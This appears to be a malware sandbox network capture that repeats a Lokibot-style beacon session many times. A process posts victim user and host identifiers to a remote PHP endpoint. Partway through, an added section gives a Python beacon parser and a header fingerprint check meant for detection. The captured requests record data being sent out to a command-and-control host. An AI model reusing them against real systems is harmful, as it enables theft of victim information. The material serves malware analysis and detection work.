                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          44 | 192.168.2.4 | 49813 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:00.631942034 CET | 6057 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:00.970818996 CET | 6194 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:01.344598055 CET | 6194 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          45 | 192.168.2.4 | 49814 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:01.922836065 CET | 6195 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:02.257450104 CET | 6196 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:02.623399973 CET | 6196 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:02 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          46 | 192.168.2.4 | 49815 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:03.230295897 CET | 6197 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:03.565103054 CET | 6197 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:03.928021908 CET | 6198 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:03 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.
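
The beacon shown in these sessions, as an added example that is not part of the sandbox report: a Python parser for the POST body in the "Data Raw" line, plus a header check for the request that carries it. The sandbox prints only the first 82 of the 163 body bytes, so the last field is cut off and the parser has to say so rather than fail. The field layout used here (16-bit version, 32-bit packet type, a 32-bit-length-prefixed ASCII id, then fields that each carry a 16-bit wide-char flag and a 32-bit byte length) is inferred from the captured bytes, not taken from a Lokibot specification; the hex, the request headers and the plain-ASCII test body are constructed copies, and reading the wide strings as a user name and a host name is an assumption.

```python
import struct

# Constructed from the "Data Raw" line above (first 82 of 163 body bytes;
# the sandbox truncates the dump, so the final field is incomplete).
BEACON_HEX = (
    "12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 "
    "6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 "
    "34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 "
    "2d 00 37 00 31 00 36 00 54 00 37"
)

# Constructed copy of the request headers from the same session.
REQUEST_HEADERS = (
    b"POST /wap121/five/fre.php HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    b"Host: www.ritcophysiotherapy.com.au\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\n"
    b"Content-Key: AD291CE\r\n"
    b"Content-Length: 163\r\n"
    b"Connection: close\r\n\r\n"
)

LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"


def parse_beacon(data: bytes) -> dict:
    """Split a beacon body into its length-prefixed fields.

    Layout assumed from the capture (not from a specification):
      u16 version | u32 packet type | u32 length + ASCII id |
      repeated: u16 wide flag (1 = UTF-16LE) | u32 byte length | bytes
    """
    if len(data) < 10:
        raise ValueError("body too short for version/type/id header")
    version, ptype, id_len = struct.unpack_from("<HII", data, 0)
    off = 10
    binary_id = data[off:off + id_len].decode("latin-1")
    off += id_len
    fields, truncated = [], False
    while off < len(data):
        if off + 6 > len(data):          # not even a full field header left
            truncated = True
            break
        wide, length = struct.unpack_from("<HI", data, off)
        off += 6
        chunk = data[off:off + length]
        complete = len(chunk) == length   # False when the dump was cut off
        if wide == 1:
            # A cut-off UTF-16LE string may end on half a code unit; drop it.
            chunk = chunk[: len(chunk) - len(chunk) % 2]
            text = chunk.decode("utf-16-le")
        else:
            text = chunk.decode("latin-1")
        fields.append({"text": text, "wide": wide == 1,
                       "declared_len": length, "complete": complete})
        truncated = truncated or not complete
        off += length
    return {"version": version, "type": ptype, "binary_id": binary_id,
            "fields": fields, "truncated": truncated}


def lokibot_request_fingerprint(raw: bytes) -> dict:
    """Check the request line and headers for the traits seen in the capture."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    req = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    traits = {
        "post_http10": len(req) == 3 and req[0] == "POST" and req[2] == "HTTP/1.0",
        "charon_ua": headers.get("user-agent") == LOKIBOT_UA,
        "content_key": "content-key" in headers,
        "octet_stream": headers.get("content-type") == "application/octet-stream",
    }
    traits["matches"] = all(traits.values())
    return traits


if __name__ == "__main__":
    beacon = parse_beacon(bytes.fromhex(BEACON_HEX))
    print("version 0x%02x type 0x%02x id %r truncated=%s"
          % (beacon["version"], beacon["type"], beacon["binary_id"], beacon["truncated"]))
    for f in beacon["fields"]:
        print("  %-14r wide=%s declared=%d complete=%s"
              % (f["text"], f["wide"], f["declared_len"], f["complete"]))
    print(lokibot_request_fingerprint(REQUEST_HEADERS))
```

On the captured bytes the parser yields version 0x12, packet type 0x28, id "ckav.ru", two complete wide strings ("jones", "910646") and a third that is declared as 30 bytes but has only 25 present, so it is reported as incomplete and decodes to "DESKTOP-716T". The header check fires on all four traits for the captured request; the User-Agent string and the non-standard Content-Key header are the two that a detection rule would key on, since the URI path and Host change per campaign.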


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          47 | 192.168.2.4 | 49816 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:04.508068085 CET | 6199 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:04.845724106 CET | 6199 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:05.223133087 CET | 6199 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:05 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          48 | 192.168.2.4 | 49817 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:05.814223051 CET | 6200 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:06.153937101 CET | 6200 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:06.530955076 CET | 6201 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          49 | 192.168.2.4 | 49818 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:07.112781048 CET | 6201 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:07.451307058 CET | 6202 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:07.826639891 CET | 6202 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:07 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          5 | 192.168.2.4 | 49752 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:13:09.379899025 CET | 1540 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:09.717972994 CET | 1541 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:13:10.094573975 CET | 1541 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:09 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          50 | 192.168.2.4 | 49819 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:08.413652897 CET | 6203 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:08.749602079 CET | 6203 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:09.114203930 CET | 6204 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:08 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          51 | 192.168.2.4 | 49820 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:09.712193966 CET | 6204 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:10.049978971 CET | 6205 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:10.421947002 CET | 6205 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:10 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          52 | 192.168.2.4 | 49821 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:11.002002954 CET | 6206 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:11.337898016 CET | 6206 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:11.707024097 CET | 6207 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:11 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          53 | 192.168.2.4 | 49822 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:12.313270092 CET | 6207 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:12.653307915 CET | 6208 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:13.023763895 CET | 6208 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:12 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          54 | 192.168.2.4 | 49823 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:13.908883095 CET | 6209 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:14.247961044 CET | 6209 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:14.616005898 CET | 6209 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:14 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          55 | 192.168.2.4 | 49824 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:15.437535048 CET | 6210 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:15.773653984 CET | 6211 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:16.140294075 CET | 6211 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:16 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          56 | 192.168.2.4 | 49825 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:16.710648060 CET | 6212 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:17.048197985 CET | 6212 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:17.424968958 CET | 6212 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:17 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          57 | 192.168.2.4 | 49826 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:18.024683952 CET | 6213 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:18.362878084 CET | 6214 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:18.739638090 CET | 6214 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:18 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          58 | 192.168.2.4 | 49827 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Feb 22, 2021 19:14:19.321867943 CET | 6215 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:19.660252094 CET | 6215 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                          Feb 22, 2021 19:14:20.031702995 CET | 6215 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:19 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
